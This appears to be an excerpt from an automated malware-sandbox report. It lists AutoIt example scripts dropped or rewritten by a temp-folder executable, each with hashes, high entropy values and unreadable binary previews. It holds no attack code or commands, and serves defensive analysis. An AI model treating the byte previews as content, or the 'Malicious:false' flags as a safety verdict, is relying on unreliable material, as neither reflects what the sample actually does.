                                                                                                                                                                                                                                                Preview:U'.IuF.}-U1..V....R[p5..O.)G.1......(..y*<...n..zC+...ap8.[..1..X ...*..E...MG<Q.z`a.]..*..A!.i...........C....f..=la)...}E..R....l.y...!'ob....F..*..}u".8a.l.Xp.v.....4.-).~l..eOH......u...!*.O..3.C......R.~.?.I$*.Rpq...]4vjeL..&.T..L...z?.....l..Y3.b..>....V[.;G.357b5#..qP.0...4...'t.Y.B%$n.5.R.k..NC.6....9U.+..]./...x.l.?8(;;.>............y.. .Z...........$K0...q9?=k... L..].....&.h/.P....I......7..iX..D..P.|.;.G_...p......*....<..........Y.~.Y.\S..R.E'1..q..B...xX.i.....L$.3.A.3.PJ.. -B.....N^.~I.xj.e..n".sGm.;a......0HH.;..I?Y..L..=j....T..dw..6.U.p.X..).v4_N.;....+.....g..'..0.....e.Q..DRa...I.......es.-.e.H.....b_..#%..,-..p....n...n..,.J.._..csm......]..Z5....R..... H....oFy..hY....nD.....<^...sm@tz......<...`..?d........?=...Na.....9.....\=.l.....W.O..Y...W..L.[r..9,"....vpj...^..\.X..9>7.}....Q. ...R..My...>x..i.t....A.D......Y.....P$....3pM..g...>R.............0D.U..0..*V..TCc3I.+......p........Hf.aZ0.&....MB.".j...=O\T...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ClipBoard_GetDataEx[2].au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2749
                                                                                                                                                                                                                                                Entropy (8bit):7.930099188478791
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Bzv/erND4E878rMAprh5oK2SAM8EcvPGQoiUqWCCFh74o0jZtwz8:lE5wAL5olIDcX3MVtAlez8
                                                                                                                                                                                                                                                MD5:E3E709791A2070A22ED2AAAFE53D0CA3
                                                                                                                                                                                                                                                SHA1:785C98F6F3DEBC3C014D9A1F530F8C04A0DEB007
                                                                                                                                                                                                                                                SHA-256:479081ABFBEB04730A33CE478D35AB1B0A169F6E500F131FD25F0BCD3F0A7D6B
                                                                                                                                                                                                                                                SHA-512:4CC64AE8C31706B5836965F0D633BDDE1EF93C1D8B97177A78D7710D63B4BE2B138DD48C609A1AF3C2AD523A3EF239D97CEB46C327BB63CED3F5ADF444857FFF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:......y.T.$.C.5.o...Q..(> .9..+.BR$.}7.$F.s}...o..T..5...h..r_.~...q...-p...,.....YN.h..W.....m5G\....?2...2..o3..MXB.*hz....e.Y.........b..J..tr`......B..5t.....c.F.;N....Y..!......&..`9.6..UP..7.^A.$y.D.#.^.r.2...V.<.yd.4K....=s...6\{...,.C5r....SY.s...F.7..X...9.=....@.,..vyUu....4......a.&MzR.D.....n..Qv ..d..N...T3.....:...7.P......?.."C..%..u..eV...$..I@......L%sTcs.p....$..k.HMV'.T...#...E.....n......V...qf.>.K=o........ .w8X.f.......Z....QzI.>..............1.V..|".N#W..)@n...z.....^X,......~...K..EG...y..4G.......v.Bp.Z.z..].&y.W*.4@b?..L......].i.d.....8..Y...O...Ag(.......g....{.......cg*.p..m.<i.......C@...r+..e..W.e......x...7@8..J..2....6q.I..L@[...ZI-.%....|F..{L...d..e.o..7.K...*.r..*.aO..e.i...Q5.C..T.A..:R.(T....3.i;3.%!.R......fK...|.".l.L:.....[...-.[FF_....3..f.......-P...7.-B.gW.x%1.3..?.m{5..E.J.........T....<..bI[....P.g...{. ..W.#-....z6`....Xy:._.G....V.......d.V.T.5.M.o&...K...T."...&hM...g.].\..\-n.....F...*B...

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ClipBoard_GetPriorityFormat.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1440
                                                                                                                                                                                                                                                Entropy (8bit):7.846258196721319
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:0B5HFyLcfFopnkCGYqyYS7pNr6DOTGIBy/Ggcv3OQgjmJrc0YXUZtwsTh:6ILcf8KYqyYS7pNr6Z+y/zY3OQu4o0jx
                                                                                                                                                                                                                                                MD5:B439DD25AAF6DFE2577DABA2DB364992
                                                                                                                                                                                                                                                SHA1:523DB20ECEFE64FF75EC20B6D65CD86B86D85669
                                                                                                                                                                                                                                                SHA-256:60F9BA920C65C3A362282B76508906841BF415DA6D96ED3DA28DDA6F256C453F
                                                                                                                                                                                                                                                SHA-512:BF22481613F9EE328BB5232412B6F4BC006CCCEF8B05C5A7D9EF615DDD1464B443D5CA1CB7C2EAA375C631EA0C3AAC1EFF58D3BAF3E829DBC7947AB69C109D44
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:W5,.f.#.4$O.|...@~[L.c...5.......T.\..g.4.=4.=..*..p.S.._.Z.%.wvz.y.Bo.3p}<.x.Sg..o...."....8.R.....z0.$X9..}f .....'c......n..4..i7.....&....H..e].r...D.....J...k..$0.-8...;Y....*..4Z.....Gk.!.....G..'7c...../3..^..;Vz...OOSW.#.Q.......f.....uES.....&..k;u..{U.&[R....j..q..$....,V.&...7`.>........_...3..\<....W...B.. ...C.y%...y!$.d.v.d.oBM..V.g......m))...f.EF.*.$.N...i.........g.{..f.....g.$b.Y......&....r..(........>I:....m.v6.($N.>*..I}v.o/eaK..8.\..~.a.&.].....O.J.J5~.D..|.zk.v?6..P(..e....T....B.....A.Ko.9...t>...L....%...d...5..J...}.....`..q.....;.,.8..../2.f.r...f.).$1..JP........|...$.3.`3...#..]dpH...2:'=.kB ...e.Oh.%t}G......s....,."...z..k.U.P.}...j..6...Ypt.a.}......\k.c....^0..../...aa.|..s>:P8.j..C.Q..0..$W...8~.........G.9.3.,.o3"?.T5^#.q{.....*.}..'K+@50......>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ClipBoard_Open.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1767
                                                                                                                                                                                                                                                Entropy (8bit):7.885553214507059
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:1c4bdQOIlbtHv9svOzT2OLv4o0jZtwUYZ:1XbKOebtHv9svGRMleUY
                                                                                                                                                                                                                                                MD5:23F0DD7E11916E18F6A17D0308907A28
                                                                                                                                                                                                                                                SHA1:AA148CF5663C99A31D42E0BE74C54B11936B30FD
                                                                                                                                                                                                                                                SHA-256:01BFC906441CC25CE0B850CA59DC644552C0407CD23E831A258268E9911AB9C2
                                                                                                                                                                                                                                                SHA-512:8BA8B07DD76AC58234E2E4D14ED5B744AB1A0A2FAFA63C05F06DB828BAB32D51138725DC58D3A450E3F9380A1BE56FB6EA6740C5FE56520101D9FD13BE19C7D6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Pd...aS3..h.k..|.Z.F..M'.....FG1..wf.Sd....a.a.R.~|..<!g.........i@u.......!.$\."M.P.B..|...&<......_ wZ.S..V.4.=2.g.......7..l.e..t.W.O.YV.S=...<C..n..a.^O.cq..hj`w.n..'...S.E.I.\b.\.VU.p~.o...mVv....gk]_y..at..$..[..l.p..~.4BY..3......]W\...=?|..dx.*).9..=BSv%.GP.t-C.0...&......P.xM.H}.=_.O.vn...._...S.s...W..q.....:.S-..jk.^.g..#...VJ.(.:..?..lS....E.`....P02..(Y.q%.m}'.l....x^.fdx..0.h.U...JoB .J53.........`u.............R...W,.]k.|...CV...D..n~b.N.Kl....*._...'YT..P].#.....L..vu/..........Q][...v.y.......5I).j...MO......t.S...............z.Q.9\..+).....!..3r.....y...'.[..*g.Xn.U/2..t]_gj......6...n;$Y..V.@:.(..-`G..E...y..`../..u..M^.!../..V..L ...{.W.d..{..:.....>.4,.a.@..a.^..u..H..b.9mD.j....-.Xm...(..`.5n0..Kv=|x...Z.2U..<....M.%_8..~...#Q..p....&.:MHZ.U.U...'...E.....ziH..~.....b.zH...=..m'..K.w.-.....U~..T.>@-......K".../.......ri*......-l.".\.*`5..u......d...lD..W).......a....,kY..i....J...I%.B"..........g...{......`f..'.*..S7..|.K

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ClipBoard_RegisterFormat.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1491
                                                                                                                                                                                                                                                Entropy (8bit):7.853305877692898
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:32IfvlsZ7yX0QXJQXzh2NbDfXTWanT8ZUHnZPxuBnq76KDw4NjmJrc0YXUZtwsTe:mIfiJeeXzgNP7XnT8uZpKnJKws4o0jZo
                                                                                                                                                                                                                                                MD5:F2C626390637958945B03CCD06B650A0
                                                                                                                                                                                                                                                SHA1:5542C14102160806608CA20FDBC8B0A735155639
                                                                                                                                                                                                                                                SHA-256:016987CFD5E3AD9C5AA61851E52CDF6DBE936AA23E757BD79D3C4DBA86D8ACB1
                                                                                                                                                                                                                                                SHA-512:112110A486BF8F543EBB7A7C780E83435430DE2CF7B745C6D1FC437FCD3154C3B4C7ABCB1BDE0B6301BA474E4BACB66223FE8B2E16C9E3B200DBA6D1DFA42C99
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.?. .... .bZ{..B&,....9(6.C...u..?...@..AQ!..1.^.d....?..mw..Mw..p=......&..8..gj......q5oWv...(..`N.. ..1.^..,y........#.'.7.e..a...Y...]{&......%...-&.`.F.R(../{=.8..1.o;.8 .".......J.........my\.n.G.v.Tl...Z.x.N...j...!.:/..!..".@..E.../..v4..I..+/......F.q7b.;Y..2..zhy.u)|..b|r...%....?g.r.29.l.S...O.a......9..$b..Z.c..u.......y......O:|...q..{..>..hu..bxy.'.E../.,.%....4.L..~...%.7(/.tj...".N.\...]../lQ*...4Z.A........$.uU.z!-....X:.L..$*<.Wz*<....T..i..w..|..l=@ge.4.u...o..........m.#Ue..{.~.<.t....u9...%lt.X....A...g..O..-...Z9....w..}P....._.j7....8aa.[.C.p.L..c.{.dq.T..].q..i...*7..pVu.rC. .W....W~?.....$a..W.A..N.h. {.a......1.....Y...'.......]....3.....7^.R....G3.[...a..&..%...rH..]<5. .\.w.....&.4...@.*..c."..;....Jo.q.;...^..R.:d.F......m.G...d..s..Na....{.%.>>...c....9.>=..buO..o..j.NP...n..&4`..r.'X....#./....%..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)..

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ClipBoard_SetData.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1537
                                                                                                                                                                                                                                                Entropy (8bit):7.849420721172036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:HwUv2Bet66wrP//QBB+2AE9yqN2NkfP2JA7jmJrc0YXUZtwsTvB:Hws2BW6NrvroyqN2NbC/4o0jZtwS
                                                                                                                                                                                                                                                MD5:1B5D552AD8AE40EDCB0C6392C066E01B
                                                                                                                                                                                                                                                SHA1:07A8B8339FFDB2C8A76BC98B4B6488933648FE5F
                                                                                                                                                                                                                                                SHA-256:0DCBE40078964451C50D15FA457FC5D6A82E3E4224D38FB56F94C812245A4F9C
                                                                                                                                                                                                                                                SHA-512:B75AEE1E9395402129F3846F30BB4B18162859854971D61E0CFBEAF5FA007D7ADBA38DE04EE50C4C1E060454CEE728639B0FAF2E202DA0712E593F4D604E7C49
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:ek\P?....4X...MY...fp\.H.`2^..Z..s..}'Z../.JV{D.8E8.p/|j(.{.*`..a...l%.}....s...u:....(5..+...N..|._....KF....T.Yq.I....K...Wg.r.....*.s..TC$..?....rZ......f..F...^.L.M..I.`..A}..'.....'D7].4......NL^..~..).?..\.#.=..g.z..x@"h.a$...<Lw.~...../.kv.l:4Op...gMx.......:u...A..;_.G....6.z...VY.-N............wcm2_...{.x..%..~....?...,V.Q.9.{.}^!k...l.K..8ts...:.)...I.4..2\.j..p...tj.V.....eI&..Br...qyU.~......d..O.......O.....^@..EpE.=w]9.,#.v..54e&l..}i.^.C.+.x.../.%...hId.Q..I.%..[*....7..c^.].XI|.3E_.i...g.+.MS...=.<...x.....N.T~.S..t..Q.C.3..i-k.,H.T."...:..r..H.|v. .g......K8{Zv._u,.Qi................n..7W+.nv...GhT.q]..yH...J.d..m..3\kd..\....|1......+.`....{.....C...l{.....t..6.~...Ye!..6.......y.CJ.......R-f.K..t...5F...:.o..5FV.W......G.C'%i...{.C.....?..Q.}.\.p....n./|.|.2....v2\.!%...=B...@Q6...Z....nY....`$2....g..r.....[po9..u.:."....D.=P..Tp......3..JR..9.#)...n.. ..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ClipBoard_SetViewer.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2457
                                                                                                                                                                                                                                                Entropy (8bit):7.919201052603598
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:PpzIou5mOiyRvfau8yIsJ1T7UyuHBhhKOzKg+x4o0jZtwf:PpzW5pJhvT7UyWYg/lef
                                                                                                                                                                                                                                                MD5:38CD194958D79C57B299B801FBF219EA
                                                                                                                                                                                                                                                SHA1:026A118C20A50C5A0BC447257E1136C28374198F
                                                                                                                                                                                                                                                SHA-256:92F9FA9571993EC9B30965197048B17EB19B2FE68DAAEEFE7527F44E325D5511
                                                                                                                                                                                                                                                SHA-512:A932D7E391F60AD0A1E871B8129786F609339054842D9313BB9411763AA20EE0D29C31A039E706ACEB6677A5CA19ABA8CEC3582651F9B29F4344AA6230C0F9CA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:\?..V.....(.........".n......H..g!.&.Q/....O.8.T.2x.n...z.9g.o..3...3.S.....*..."......L....b....i#..X.?..A.=.....*.b]nL.[....S.V.<..y.[RG.E't.2.N....I.t..lc|?.F..g.X..,!..R'..AA.0G7Fp.(..f.z.......3}_a.O..h>\.l.w...~@A......'...Y..>./.~..^....s....F8.*...5E.&.......p..;Q.g.....H....>......k.rf..i..........y.....e_..f......*)..0.&d..h......$P....{...@D....RI.._...Og..q...3.U...&.L.....XZ....N........2.n...X.7.n=v..f2.*..[..P...7..E.0.........f._.E[..cS...E(`}h...:.O.x%......{X....V........?.D*..Y<aj;5...r...].....h.X+...6...B.`#.....*...X.9...S.b..l.D>\.xr.Vn.o\...U..: .?t.~+9e....i_.{....u7).O..M.W...p...b.ni{.....5...G..S...O..........RmvT..>-<Y.$!...|.&8.S...e.D.7<e........5=M.)....v-..!&b.....`.,....+....Y..........>....'.0/.....3~.....N2.&F.E..4.A\.....?.k.R.#....s...*m..7..l}vs.*.\@H.W.A......S8...k.x>.4)...!..n......#}...utx.. :f.be...K.^.t...{...<.{=%.....Cw.....z....m.DZ)yje?.Ul*.L1.`V/Uw0.......%..../Ax..r.s....;.t.

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ClipPutFile.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):999
                                                                                                                                                                                                                                                Entropy (8bit):7.7648837280612755
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:+NJxoGYKIibwG0S0uUgjmJrc0YXUZtwsT3Z:s57IibwC0Hu4o0jZtwoZ
                                                                                                                                                                                                                                                MD5:B0479A5653975CD693627CA9840A5684
                                                                                                                                                                                                                                                SHA1:32F765123E9AA27C42FA891485F9C4AF46CE342A
                                                                                                                                                                                                                                                SHA-256:6C49776D9300C46F9B928D8393186397B8A1A42D6AD8CA6128DB72835D0E1F0C
                                                                                                                                                                                                                                                SHA-512:CAFD079114ED991F2FC77FC2DBBB0ED22C4E198A2DC8E767B41C646BFBDF10755AF8030585B42ECD69EC1B96ED15DBFA1A0C35C89E4A4F9C834358BC2CEB49C6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..$..\6.jcv.....\/:..5....eXw?.s.X7..V;...&mArr..."5=._5..e...9l...4^..0P.b.....6.@..>._...k..g...\.....h.............q....Qu...HV.'.i.1O......:..1`....C.<..`..k.....J...lT.....c._..R..GE..s/....x4sr...%Z...:kl(.3.."...@.2. G.2...g=.-O0?9`.75c8..:.;./. r....xh./.^.k;.7xz;..|3c..=.Y"......hHg8..cH8q.~.......V..gK..u..!...r1.I..#.!..GS .[|..6%.0.v41..5V..^..~fX7.Xz. *........>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.R.}c.l^..g.....S..>kBM(...c.E.........................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ColorConvertHSLtoRGB.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1289
                                                                                                                                                                                                                                                Entropy (8bit):7.835958497660939
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:RdUNUPFjdxLkBu9vfLxweCst9kgjmJrc0YXUZtwsTO2a:RdnFjHko5WM994o0jZtwP2a
                                                                                                                                                                                                                                                MD5:7AE34E3220C44EC58FABED6337C39BE9
                                                                                                                                                                                                                                                SHA1:BAF529B8E30708C1EB5D7F8012F44228DC6118CD
                                                                                                                                                                                                                                                SHA-256:2D8E82F3A468489B71BF9811D5B06378F1AFA2280907275FF2661A3DA7AE66CF
                                                                                                                                                                                                                                                SHA-512:0F235CA9ABEE6F34C3AC13AC482C2FCE9DC62E64DC0FA12A53B77AB626F9AA881D6CFFA624510B5BF34BCCF5C3327261E31AE604765E237F38318E39AC201289
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:zY'........+=.Y...\.3.k...O5.D&.0)..0.u...1.N`..Y....@..?F..........b..7..B"......?...(..?{.v.29.4.K......=V...Ri5.......[...f.9e.{.....z.....a....>..75..w[.....6Q.#..\c.A`..Ov..Q=.0..^|/...$u...[....R......=.[......n`..$b2.M..n..0....3d\.M)..A....@...<t3.../.5...Q:F<6.p..~T..+...s+..,......`......qI..o...o...H..'{....<l.8TzD.z.....:.}..0..........iU...C.kBE.u!.....T83.Dg....r.^.&.b.....4..y....{..hP.n?.f..)+...>1tw|...$...U.R.;..(a..K...>.....9.z..9,JL^2...D....%..).......'..~.D..[<........^..H.E...R{.._.W.]. .&.Ze......<....}y.X...Q.&~Z..i.~.5.2d..\-.^b.'..7S.,L.l.1....{G.L..I0.i(...f~.0.H.I..x.._e..d]j8.2...`(]v<.}..C`.a..K...".....I..>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ColorConvertRGBtoHSL.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1289
                                                                                                                                                                                                                                                Entropy (8bit):7.845099649165368
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:buFYJF3oEf28iprw2NEXq8yg3UmM+Spz6tjmJrc0YXUZtwsTp:iFUn8pXNEsDy4o0jZtwy
                                                                                                                                                                                                                                                MD5:520B3B8B947343D3BA5610EDCEC30F6E
                                                                                                                                                                                                                                                SHA1:D6207B002EF7E17014FEEF802FF43BD38FA533BA
                                                                                                                                                                                                                                                SHA-256:839623C9DCDB6CB2C0991D48C8C62D4A533BF3347B94A8EE317A2AC909E6E53E
                                                                                                                                                                                                                                                SHA-512:8CF2465CA8EA1B5B830FCA6D81C89CF712DD7907104E14FBC0C7BE25C94A69F0BEC055B16392F56DE80EB2C8DA520D7838E1B1BA84A034C125583BD6404EA02C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.....]..L...p...|.H{M.LC.....!T.8.tX#..A.5.g.{C....f_.../.....*#.Z8..U.Ki.D......n.t...-.p...W...=.X[...Z+.\.5"^.V.w.5B\..*.3...Z.H....).`x(.Vj7p..=.^..Q............ks..B..@(..........h....Q...q.s|.]q....~;/....V.. .2...Lc.u.P:..).L,o`.e.;..tn g<.kYY...,..v...;.........^6...b.Y.D3...1..F.Ll../...?#x.T..&....wD..ga.r^$+.....$s.u.._....!..h.h...K139.1.F.y|s.v..n.B'R..-...QX.AUe..o.^..6..4....m....~l...+..5.[..JT.....|...Hb...3..J..T....1R.....Z...7.A.!..!Zm`..o.I/%j.oP.+.=f.....Z.F%.....,^0S.,.S..U.....[/........BUB..-.|.CJ...']I..|.+.@....9..,...)...10"..h._{.DH...ZW...C".....)z..5_...)+j,...1.L.t......5....Bt..\....C(.U..'.>. ...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ColorGetBlue.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):757
                                                                                                                                                                                                                                                Entropy (8bit):7.717474518066009
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:qtEGQcgvE3LijDjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZo4ku:IQcgvMejmJrc0YXUZtwsTMo
                                                                                                                                                                                                                                                MD5:FE4C9EFA8F8F5AD189ADCBD4FAFAC015
                                                                                                                                                                                                                                                SHA1:CF80B249241949EC21BFE544318AEA6230C40D79
                                                                                                                                                                                                                                                SHA-256:9748A9691CE84709E7126D0AF950E800F66EA873E7FDD9043309C1AF0A772AE7
                                                                                                                                                                                                                                                SHA-512:2A8742CC1D447E02E0F2D650A7E93D76FDBF0106BEE1284C9AF5D87BFC05A24A383FF90DB4EE21D60C55D5481821C3D6D6BD8C4A31CAB3FA210E75E1A8CE77AB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..nB....(.2*......o... .....=..L...]Ei....&w.zdP&t.B....:2.ni..\....e..[......G<.{.....u.R6.^.%.(..V....c...fk.X.ED..?TN.(.V.[....@`S..4..@aH.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.qe.?.Z.t.....O.X...>.Lj!.{.`0.p.K.....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ColorGetCOLORREF.au3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):901
                                                                                                                                                                                                                                                Entropy (8bit):7.7360602279068695
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:LR1y9Hp6vOjTWJwfDo1gyjmJrc0YXUZtwsTmOfus:LRs9HAvOHa1g84o0jZtw6
                                                                                                                                                                                                                                                MD5:C90364D45DA2415D5E97EA61D35EAFD5
                                                                                                                                                                                                                                                SHA1:39D6C07CD1FE668AC34FE30DAB50CA41A14D2C7E
                                                                                                                                                                                                                                                SHA-256:BBE52A8C7755485BF89F6CDC1ADB3AB7DD0CE1C1B811BA1DE97BC515FFF8A8BD
                                                                                                                                                                                                                                                SHA-512:D470BF71CF3E6AF56107D53F386FCC2DA1DEF3D23C39371CAF219CCBE9EEA13F516CE9C78396B545775C18D14068FEFFFD4FD85590F2E1029118A4C55CE969CB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.......[....z.8.m).{.......+.s$,f..........*.......p.L.A....._/...H.u....# .......d.......k..E.l...}.6..a.J?$....Z....\.yk*.{.{....%.C..iI..<.A.Xw..7u.<n<.,o'....ho...t.\.&..7..HN.iy..s4......NE...Z....;....R\...Ah..td7d.8..2.....l....../V0....$..p&S...+.8...Bv.....+.O...M+.u....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..$r\.H.,..;O....h....|.v.IGY!..0.+.R%...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\AutoIt3\Examples\Helpfile\_ColorGetGreen.au3

                                                                                                                                                                                                                                                Download File
